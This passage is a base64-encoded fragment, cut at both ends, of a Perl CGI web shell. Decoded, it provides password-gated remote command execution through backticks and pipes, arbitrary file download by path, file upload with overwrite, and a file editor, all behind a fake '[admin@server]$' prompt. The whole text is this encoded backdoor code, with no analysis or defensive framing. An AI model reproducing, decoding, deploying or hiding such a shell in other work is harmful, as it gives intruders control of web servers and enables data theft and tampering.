pdAojIGRpc3BsYXlzIGEgcGFnZSB0aGF0IGFsbG93cyB0aGUgdXNlciB0byBydW4gY29tbWFuZHMuIElmIHRoZSBwYXNzd29yZCBkb2Vucyd0CiMgbWF0Y2ggb3IgaWYgbm8gcGFzc3dvcmQgaXMgZW50ZXJlZCwgaXQgZGlzcGxheXMgYSBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyCiMgdG8gbG9naW4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUGVyZm9ybUxvZ2luIAp7CglpZigkTG9naW5QYXNzd29yZCBlcSAkUGFzc3dvcmQpICMgcGFzc3dvcmQgbWF0Y2hlZAoJewoJCXByaW50ICJTZXQtQ29va2llOiBTQVZFRFBXRD0kTG9naW5QYXNzd29yZDtcbiI7CgkJJlByaW50UGFnZUhlYWRlcjsKCQlwcmludCAmTGlzdERpcjsKCX0KCWVsc2UgIyBwYXNzd29yZCBkaWRuJ3QgbWF0Y2gKCXsKCQkmUHJpbnRQYWdlSGVhZGVyKCJwIik7CgkJJlByaW50TG9naW5TY3JlZW47CgkJaWYoJExvZ2luUGFzc3dvcmQgbmUgIiIpICMgc29tZSBwYXNzd29yZCB3YXMgZW50ZXJlZAoJCXsKCQkJJlByaW50TG9naW5GYWlsZWRNZXNzYWdlOwoKCQl9CgkJJlByaW50TG9naW5Gb3JtOwoJCSZQcmludFBhZ2VGb290ZXI7CgkJZXhpdDsKCX0KfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIGVudGVyIGNvbW1hbmRzCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50Q29tbWFuZExpbmVJbnB1dEZvcm0KewoJbXkgJGRpcj0gIjxzcGFuIHN0eWxlPSdmb250OiAxMXB0IFZlcmRhbmE7IGZvbnQtd2VpZ2h0OiBib2xkOyc+Ii4mQWRkTGlua0RpcigiY29tbWFuZCIpLiI8L3NwYW4+IjsKCSRQcm9tcHQgPSAkV2luTlQgPyAiJGRpciA+ICIgOiAiPGZvbnQgY29sb3I9JyM2NmZmNjYnPlthZG1pblxAJFNlcnZlck5hbWUgJGRpcl1cJDwvZm9udD4gIjsKCXJldHVybiA8PEVORDsKPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+Cgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iY29tbWFuZCI+Cgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPgokUHJvbXB0CjxpbnB1dCB0eXBlPSJ0ZXh0IiBzaXplPSI1MCIgbmFtZT0iYyI+CjxpbnB1dCBjbGFzcz0ic3VibWl0InR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4KPC9mb3JtPgpFTkQKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIGRvd25sb2FkIGZpbGVzCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50RmlsZURvd25sb2FkRm9ybQp7CglteSAkZGlyID0gJkFkZExpbmtEaXIoImRvd25sb2FkIik7IAoJJFByb21wdCA9ICRXaW5OVCA/ICIkZGlyID4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRkaXJdXCQgIjsKCXJldHVybiA8PEVORDsKPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJkb3dubG9hZCI+CiRQcm9tcHQgZG93bmxvYWQ8YnI+PGJyPgpGaWxlbmFtZTogPGlucHV0IGNsYXNzPSJmaWxlIiB0eXBlPSJ0ZXh0IiBuYW1lPSJmIiBzaXplPSIzNSI+PGJyPjxicj4KRG93bmxvYWQ6IDxpbnB1dCBjbGFzcz0ic3VibWl0IiB0eXBlPSJzdWJtaXQiIHZhbHVlPSJCZWdpbiI+Cgo8L2Zvcm0+CkVORAp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXIgdG8gdXBsb2FkIGZpbGVzCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50RmlsZVVwbG9hZEZvcm0KewoJbXkgJGRpcj0gJkFkZExpbmtEaXIoInVwbG9hZCIpOwoJJFByb21wdCA9ICRXaW5OVCA/ICIkZGlyID4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRkaXJdXCQgIjsKCXJldHVybiA8PEVORDsKPGZvcm0gbmFtZT0iZiIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+CiRQcm9tcHQgdXBsb2FkPGJyPjxicj4KRmlsZW5hbWU6IDxpbnB1dCBjbGFzcz0iZmlsZSIgdHlwZT0iZmlsZSIgbmFtZT0iZiIgc2l6ZT0iMzUiPjxicj48YnI+Ck9wdGlvbnM6ICZuYnNwOzxpbnB1dCB0eXBlPSJjaGVja2JveCIgbmFtZT0ibyIgaWQ9InVwIiB2YWx1ZT0ib3ZlcndyaXRlIj4KPGxhYmVsIGZvcj0idXAiPk92ZXJ3cml0ZSBpZiBpdCBFeGlzdHM8L2xhYmVsPjxicj48YnI+ClVwbG9hZDombmJzcDsmbmJzcDsmbmJzcDs8aW5wdXQgY2xhc3M9InN1Ym1pdCIgdHlwZT0ic3VibWl0IiB2YWx1ZT0iQmVnaW4iPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPgo8aW5wdXQgY2xhc3M9InN1Ym1pdCIgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0idXBsb2FkIj4KCjwvZm9ybT4KCkVORAp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdGltZW91dCBmb3IgYSBjb21tYW5kIGV4cGlyZXMuIFdlIG5lZWQgdG8KIyB0ZXJtaW5hdGUgdGhlIHNjcmlwdCBpbW1lZGlhdGVseS4gVGhpcyBmdW5jdGlvbiBpcyB2YWxpZCBvbmx5IG9uIFVuaXguIEl0IGlzCiMgbmV2ZXIgY2FsbGVkIHdoZW4gdGhlIHNjcmlwdCBpcyBydW5uaW5nIG9uIE5ULgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBDb21tYW5kVGltZW91dAp7CglpZighJFdpbk5UKQoJewoJCWFsYXJtKDApOwoJCXJldHVybiA8PEVORDsKPC90ZXh0YXJlYT4KPGJyPjxmb250IGNvbG9yPXllbGxvdz4KQ29tbWFuZCBleGNlZWRlZCBtYXhpbXVtIHRpbWUgb2YgJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gc2Vjb25kKHMpLjwvZm9udD4KPGJyPjxmb250IHNpemU9JzYnIGNvbG9yPXJlZD5LaWxsZWQgaXQhPC9mb250PgpFTkQKCX0KfQoKCgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBkaXNwbGF5cyB0aGUgcGFnZSB0aGF0IGNvbnRhaW5zIGEgbGluayB3aGljaCBhbGxvd3MgdGhlIHVzZXIKIyB0byBkb3dubG9hZCB0aGUgc3BlY2lmaWVkIGZpbGUuIFRoZSBwYWdlIGFsc28gY29udGFpbnMgYSBhdXRvLXJlZnJlc2gKIyBmZWF0dXJlIHRoYXQgc3RhcnRzIHRoZSBkb3dubG9hZCBhdXRvbWF0aWNhbGx5LgojIEFyZ3VtZW50IDE6IEZ1bGx5IHF1YWxpZmllZCBmaWxlbmFtZSBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50RG93bmxvYWRMaW5rUGFnZQp7Cglsb2NhbCgkRmlsZVVybCkgPSBAXzsKCW15ICRyZXN1bHQ9IiI7CglpZigtZSAkRmlsZVVybCkgIyBpZiB0aGUgZmlsZSBleGlzdHMKCXsKCQkjIGVuY29kZSB0aGUgZmlsZSBsaW5rIHNvIHdlIGNhbiBzZW5kIGl0IHRvIHRoZSBicm93c2VyCgkJJEZpbGVVcmwgPX4gcy8oW15hLXpBLVowLTldKS8nJScudW5wYWNrKCJIKiIsJDEpL2VnOwoJCSREb3dubG9hZExpbmsgPSAiJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxvYWQmZj0kRmlsZVVybCZvPWdvIjsKCQkkSHRtbE1ldGFIZWFkZXIgPSAiPG1ldGEgSFRUUC1FUVVJVj1cIlJlZnJlc2hcIiBDT05URU5UPVwiMTsgVVJMPSREb3dubG9hZExpbmtcIj4iOwoJCSZQcmludFBhZ2VIZWFkZXIoImMiKTsKCQkkcmVzdWx0IC49IDw8RU5EOwpTZW5kaW5nIEZpbGUgJFRyYW5zZmVyRmlsZS4uLjxicj4KCklmIHRoZSBkb3dubG9hZCBkb2VzIG5vdCBzdGFydCBhdXRvbWF0aWNhbGx5LAo8YSBocmVmPSIkRG93bmxvYWRMaW5rIj5DbGljayBIZXJlPC9hPgpFTkQKCQkkcmVzdWx0IC49ICZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOwoJfQoJZWxzZSAjIGZpbGUgZG9lc24ndCBleGlzdAoJewoJCSRyZXN1bHQgLj0gIkZhaWxlZCB0byBkb3dubG9hZCAkRmlsZVVybDogJCEiOwoJCSRyZXN1bHQgLj0gJlByaW50RmlsZURvd25sb2FkRm9ybTsKCX0KCXJldHVybiAkcmVzdWx0Owp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiByZWFkcyB0aGUgc3BlY2lmaWVkIGZpbGUgZnJvbSB0aGUgZGlzayBhbmQgc2VuZHMgaXQgdG8gdGhlCiMgYnJvd3Nlciwgc28gdGhhdCBpdCBjYW4gYmUgZG93bmxvYWRlZCBieSB0aGUgdXNlci4KIyBBcmd1bWVudCAxOiBGdWxseSBxdWFsaWZpZWQgcGF0aG5hbWUgb2YgdGhlIGZpbGUgdG8gYmUgc2VudC4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgU2VuZEZpbGVUb0Jyb3dzZXIKewoJbXkgJHJlc3VsdCA9ICIiOwoJbG9jYWwoJFNlbmRGaWxlKSA9IEBfOwoJaWYob3BlbihTRU5ERklMRSwgJFNlbmRGaWxlKSkgIyBmaWxlIG9wZW5lZCBmb3IgcmVhZGluZwoJewoJCWlmKCRXaW5OVCkKCQl7CgkJCWJpbm1vZGUoU0VOREZJTEUpOwoJCQliaW5tb2RlKFNURE9VVCk7CgkJfQoJCSRGaWxlU2l6ZSA9IChzdGF0KCRTZW5kRmlsZSkpWzddOwoJCSgkRmlsZW5hbWUgPSAkU2VuZEZpbGUpID1+ICBtIShbXi9eXFxdKikkITsKCQlwcmludCAiQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXVua25vd25cbiI7CgkJcHJpbnQgIkNvbnRlbnQtTGVuZ3RoOiAkRmlsZVNpemVcbiI7CgkJcHJpbnQgIkNvbnRlbnQtRGlzcG9zaXRpb246IGF0dGFjaG1lbnQ7IGZpbGVuYW1lPSQxXG5cbiI7CgkJcHJpbnQgd2hpbGUoPFNFTkRGSUxFPik7CgkJY2xvc2UoU0VOREZJTEUpOwoJCWV4aXQoMSk7Cgl9CgllbHNlICMgZmFpbGVkIHRvIG9wZW4gZmlsZQoJewoJCSRyZXN1bHQgLj0gIkZhaWxlZCB0byBkb3dubG9hZCAkU2VuZEZpbGU6ICQhIjsKCQkkcmVzdWx0IC49JlByaW50RmlsZURvd25sb2FkRm9ybTsKCX0KCXJldHVybiAkcmVzdWx0Owp9CgoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHVzZXIgZG93bmxvYWRzIGEgZmlsZS4gSXQgZGlzcGxheXMgYSBtZXNzYWdlCiMgdG8gdGhlIHVzZXIgYW5kIHByb3ZpZGVzIGEgbGluayB0aHJvdWdoIHdoaWNoIHRoZSBmaWxlIGNhbiBiZSBkb3dubG9hZGVkLgojIFRoaXMgZnVuY3Rpb24gaXMgYWxzbyBjYWxsZWQgd2hlbiB0aGUgdXNlciBjbGlja3Mgb24gdGhhdCBsaW5rLiBJbiB0aGlzIGNhc2UsCiMgdGhlIGZpbGUgaXMgcmVhZCBhbmQgc2VudCB0byB0aGUgYnJvd3Nlci4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgQmVnaW5Eb3dubG9hZAp7CgkjIGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXFx8Xi46LykpIHwKCQkoISRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlwvLykpKSAjIHBhdGggaXMgYWJzb2x1dGUKCXsKCQkkVGFyZ2V0RmlsZSA9ICRUcmFuc2ZlckZpbGU7Cgl9CgllbHNlICMgcGF0aCBpcyByZWxhdGl2ZQoJewoJCWNob3AoJFRhcmdldEZpbGUpIGlmKCRUYXJnZXRGaWxlID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87CgkJJFRhcmdldEZpbGUgLj0gJFBhdGhTZXAuJFRyYW5zZmVyRmlsZTsKCX0KCglpZigkT3B0aW9ucyBlcSAiZ28iKSAjIHdlIGhhdmUgdG8gc2VuZCB0aGUgZmlsZQoJewoJCSZTZW5kRmlsZVRvQnJvd3NlcigkVGFyZ2V0RmlsZSk7Cgl9CgllbHNlICMgd2UgaGF2ZSB0byBzZW5kIG9ubHkgdGhlIGxpbmsgcGFnZQoJewoJCSZQcmludERvd25sb2FkTGlua1BhZ2UoJFRhcmdldEZpbGUpOwoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdXNlciB3YW50cyB0byB1cGxvYWQgYSBmaWxlLiBJZiB0aGUKIyBmaWxlIGlzIG5vdCBzcGVjaWZpZWQsIGl0IGRpc3BsYXlzIGEgZm9ybSBhbGxvd2luZyB0aGUgdXNlciB0byBzcGVjaWZ5IGEKIyBmaWxlLCBvdGhlcndpc2UgaXQgc3RhcnRzIHRoZSB1cGxvYWQgcHJvY2Vzcy4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgVXBsb2FkRmlsZQp7CgkjIGlmIG5vIGZpbGUgaXMgc3BlY2lmaWVkLCBwcmludCB0aGUgdXBsb2FkIGZvcm0gYWdhaW4KCWlmKCRUcmFuc2ZlckZpbGUgZXEgIiIpCgl7CgkJcmV0dXJuICZQcmludEZpbGVVcGxvYWRGb3JtOwoKCX0KCW15ICRyZXN1bHQ9IiI7CgkjIHN0YXJ0IHRoZSB1cGxvYWRpbmcgcHJvY2VzcwoJJHJlc3VsdCAuPSAiVXBsb2FkaW5nICRUcmFuc2ZlckZpbGUgdG8gJEN1cnJlbnREaXIuLi48YnI+IjsKCgkjIGdldCB0aGUgZnVsbGx5IHF1YWxpZmllZCBwYXRobmFtZSBvZiB0aGUgZmlsZSB0byBiZSBjcmVhdGVkCgljaG9wKCRUYXJnZXROYW1lKSBpZiAoJFRhcmdldE5hbWUgPSAkQ3VycmVudERpcikgPX4gbS9bXFxcL10kLzsKCSRUcmFuc2ZlckZpbGUgPX4gbSEoW14vXlxcXSopJCE7CgkkVGFyZ2V0TmFtZSAuPSAkUGF0aFNlcC4kMTsKCgkkVGFyZ2V0RmlsZVNpemUgPSBsZW5ndGgoJGlueydmaWxlZGF0YSd9KTsKCSMgaWYgdGhlIGZpbGUgZXhpc3RzIGFuZCB3ZSBhcmUgbm90IHN1cHBvc2VkIHRvIG92ZXJ3cml0ZSBpdAoJaWYoLWUgJFRhcmdldE5hbWUgJiYgJE9wdGlvbnMgbmUgIm92ZXJ3cml0ZSIpCgl7CgkJJHJlc3VsdCAuPSAiRmFpbGVkOiBEZXN0aW5hdGlvbiBmaWxlIGFscmVhZHkgZXhpc3RzLjxicj4iOwoJfQoJZWxzZSAjIGZpbGUgaXMgbm90IHByZXNlbnQKCXsKCQlpZihvcGVuKFVQTE9BREZJTEUsICI+JFRhcmdldE5hbWUiKSkKCQl7CgkJCWJpbm1vZGUoVVBMT0FERklMRSkgaWYgJFdpbk5UOwoJCQlwcmludCBVUExPQURGSUxFICRpbnsnZmlsZWRhdGEnfTsKCQkJY2xvc2UoVVBMT0FERklMRSk7CgkJCSRyZXN1bHQgLj0gIlRyYW5zZmVyZWQgJFRhcmdldEZpbGVTaXplIEJ5dGVzLjxicj4iOwoJCQkkcmVzdWx0IC49ICJGaWxlIFBhdGg6ICRUYXJnZXROYW1lPGJyPiI7CgkJfQoJCWVsc2UKCQl7CgkJCSRyZXN1bHQgLj0gIkZhaWxlZDogJCE8YnI+IjsKCQl9Cgl9CgkkcmVzdWx0IC49ICZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOwoJcmV0dXJuICRyZXN1bHQ7Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB1c2VyIHdhbnRzIHRvIGRvd25sb2FkIGEgZmlsZS4gSWYgdGhlCiMgZmlsZW5hbWUgaXMgbm90IHNwZWNpZmllZCwgaXQgZGlzcGxheXMgYSBmb3JtIGFsbG93aW5nIHRoZSB1c2VyIHRvIHNwZWNpZnkgYQojIGZpbGUsIG90aGVyd2lzZSBpdCBkaXNwbGF5cyBhIG1lc3NhZ2UgdG8gdGhlIHVzZXIgYW5kIHByb3ZpZGVzIGEgbGluawojIHRocm91Z2ggIHdoaWNoIHRoZSBmaWxlIGNhbiBiZSBkb3dubG9hZGVkLgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBEb3dubG9hZEZpbGUKewoJIyBpZiBubyBmaWxlIGlzIHNwZWNpZmllZCwgcHJpbnQgdGhlIGRvd25sb2FkIGZvcm0gYWdhaW4KCWlmKCRUcmFuc2ZlckZpbGUgZXEgIiIpCgl7CgkJJlByaW50UGFnZUhlYWRlcigiZiIpOwoJCXJldHVybiAmUHJpbnRGaWxlRG93bmxvYWRGb3JtOwoJfQoJCgkjIGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXFx8Xi46LykpIHwgKCEkV2luTlQgJiAoJFRyYW5zZmVyRmlsZSA9fiBtL15cLy8pKSkgIyBwYXRoIGlzIGFic29sdXRlCgl7CgkJJFRhcmdldEZpbGUgPSAkVHJhbnNmZXJGaWxlOwoJfQoJZWxzZSAjIHBhdGggaXMgcmVsYXRpdmUKCXsKCQljaG9wKCRUYXJnZXRGaWxlKSBpZigkVGFyZ2V0RmlsZSA9ICRDdXJyZW50RGlyKSA9fiBtL1tcXFwvXSQvOwoJCSRUYXJnZXRGaWxlIC49ICRQYXRoU2VwLiRUcmFuc2ZlckZpbGU7Cgl9CgoJaWYoJE9wdGlvbnMgZXEgImdvIikgIyB3ZSBoYXZlIHRvIHNlbmQgdGhlIGZpbGUKCXsKCQlyZXR1cm4gJlNlbmRGaWxlVG9Ccm93c2VyKCRUYXJnZXRGaWxlKTsKCX0KCWVsc2UgIyB3ZSBoYXZlIHRvIHNlbmQgb25seSB0aGUgbGluayBwYWdlCgl7CgkJcmV0dXJuICZQcmludERvd25sb2FkTGlua1BhZ2UoJFRhcmdldEZpbGUpOwoJfQp9CgoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHRvIGV4ZWN1dGUgY29tbWFuZHMuIEl0IGRpc3BsYXlzIHRoZSBvdXRwdXQgb2YgdGhlCiMgY29tbWFuZCBhbmQgYWxsb3dzIHRoZSB1c2VyIHRvIGVudGVyIGFub3RoZXIgY29tbWFuZC4gVGhlIGNoYW5nZSBkaXJlY3RvcnkKIyBjb21tYW5kIGlzIGhhbmRsZWQgZGlmZmVyZW50bHkuIEluIHRoaXMgY2FzZSwgdGhlIG5ldyBkaXJlY3RvcnkgaXMgc3RvcmVkIGluCiMgYW4gaW50ZXJuYWwgdmFyaWFibGUgYW5kIGlzIHVzZWQgZWFjaCB0aW1lIGEgY29tbWFuZCBoYXMgdG8gYmUgZXhlY3V0ZWQuIFRoZQojIG91dHB1dCBvZiB0aGUgY2hhbmdlIGRpcmVjdG9yeSBjb21tYW5kIGlzIG5vdCBkaXNwbGF5ZWQgdG8gdGhlIHVzZXJzCiMgdGhlcmVmb3JlIGVycm9yIG1lc3NhZ2VzIGNhbm5vdCBiZSBkaXNwbGF5ZWQuCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIEV4ZWN1dGVDb21tYW5kCnsKCW15ICRyZXN1bHQ9IiI7CglpZigkUnVuQ29tbWFuZCA9fiBtL15ccypjZFxzKyguKykvKSAjIGl0IGlzIGEgY2hhbmdlIGRpciBjb21tYW5kCgl7CgkJIyB3ZSBjaGFuZ2UgdGhlIGRpcmVjdG9yeSBpbnRlcm5hbGx5LiBUaGUgb3V0cHV0IG9mIHRoZQoJCSMgY29tbWFuZCBpcyBub3QgZGlzcGxheWVkLgoJCSRDb21tYW5kID0gImNkIFwiJEN1cnJlbnREaXJcIiIuJENtZFNlcC4iY2QgJDEiLiRDbWRTZXAuJENtZFB3ZDsKCQljaG9wKCRDdXJyZW50RGlyID0gYCRDb21tYW5kYCk7CgkJJHJlc3VsdCAuPSAmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsKCgkJJHJlc3VsdCAuPSAiQ29tbWFuZDogPHJ1bj4kUnVuQ29tbWFuZCA8L3J1bj48YnI+PHRleHRhcmVhIGNvbHM9JyRjb2xzJyByb3dzPSckcm93cycgc3BlbGxjaGVjaz0nZmFsc2UnPiI7CgkJIyB4dWF0IHRob25nIHRpbiBraGkgY2h1eWVuIGRlbiAxIHRodSBtdWMgbmFvIGRvIQoJCSRSdW5Db21tYW5kPSAkV2luTlQ/ImRpciI6ImRpciAtbGlhIjsKCQkkcmVzdWx0IC49ICZSdW5DbWQ7Cgl9ZWxzaWYoJFJ1bkNvbW1hbmQgPX4gbS9eXHMqZWRpdFxzKyguKykvKQoJewoJCSRyZXN1bHQgLj0gICZTYXZlRmlsZUZvcm07Cgl9ZWxzZQoJewoJCSRyZXN1bHQgLj0gJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07CgkJJHJlc3VsdCAuPSAiQ29tbWFuZDogPHJ1bj4kUnVuQ29tbWFuZDwvcnVuPjxicj48dGV4dGFyZWEgaWQ9J2RhdGEnIGNvbHM9JyRjb2xzJyByb3dzPSckcm93cycgc3BlbGxjaGVjaz0nZmFsc2UnPiI7CgkJJHJlc3VsdCAuPSZSdW5DbWQ7Cgl9CgkkcmVzdWx0IC49ICAiPC90ZXh0YXJlYT4iOwoJcmV0dXJuICRyZXN1bHQ7Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBydW4gY29tbWFuZAojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCgpzdWIgUnVuQ21kCnsKCW15ICRyZXN1bHQ9IiI7CgkkQ29tbWFuZCA9ICJjZCBcIiRDdXJyZW50RGlyXCIiLiRDbWRTZXAuJFJ1bkNvbW1hbmQuJFJlZGlyZWN0b3I7CglpZighJFdpbk5UKQoJewoJCSRTSUd7J0FMUk0nfSA9IFwmQ29tbWFuZFRpbWVvdXQ7CgkJYWxhcm0oJENvbW1hbmRUaW1lb3V0RHVyYXRpb24pOwoJfQoJaWYoJFNob3dEeW5hbWljT3V0cHV0KSAjIHNob3cgb3V0cHV0IGFzIGl0IGlzIGdlbmVyYXRlZAoJewoJCSR8PTE7CgkJJENvbW1hbmQgLj0gIiB8IjsKCQlvcGVuKENvbW1hbmRPdXRwdXQsICRDb21tYW5kKTsKCQl3aGlsZSg8Q29tbWFuZE91dHB1dD4pCgkJewoJCQkkXyA9fiBzLyhcbnxcclxuKSQvLzsKCQkJJHJlc3VsdCAuPSAmSHRtbFNwZWNpYWxDaGFycygiJF9cbiIpOwoJCX0KCQkkfD0wOwoJfQoJZWxzZSAjIHNob3cgb3V0cHV0IGFmdGVyIGNvbW1hbmQgY29tcGxldGVzCgl7CgkJJHJlc3VsdCAuPSAmSHRtbFNwZWNpYWxDaGFycygnJENvbW1hbmQnKTsKCX0KCWlmKCEkV2luTlQpCgl7CgkJYWxhcm0oMCk7Cgl9CglyZXR1cm4gJHJlc3VsdDsKfQojPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09CiMgRm9ybSBTYXZlIEZpbGUgCiM9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0Kc3ViIFNhdmVGaWxlRm9ybQp7CglteSAkcmVzdWx0ID0iIjsKCXN1YnN0cigkUnVuQ29tbWFuZCwwLDUpPSIiOwoJbXkgJGZpbGU9JnRyaW0oJFJ1bkNvbW1hbmQpOwoJJHNhdmU9Jzxicj48aW5wdXQgbmFtZT0iY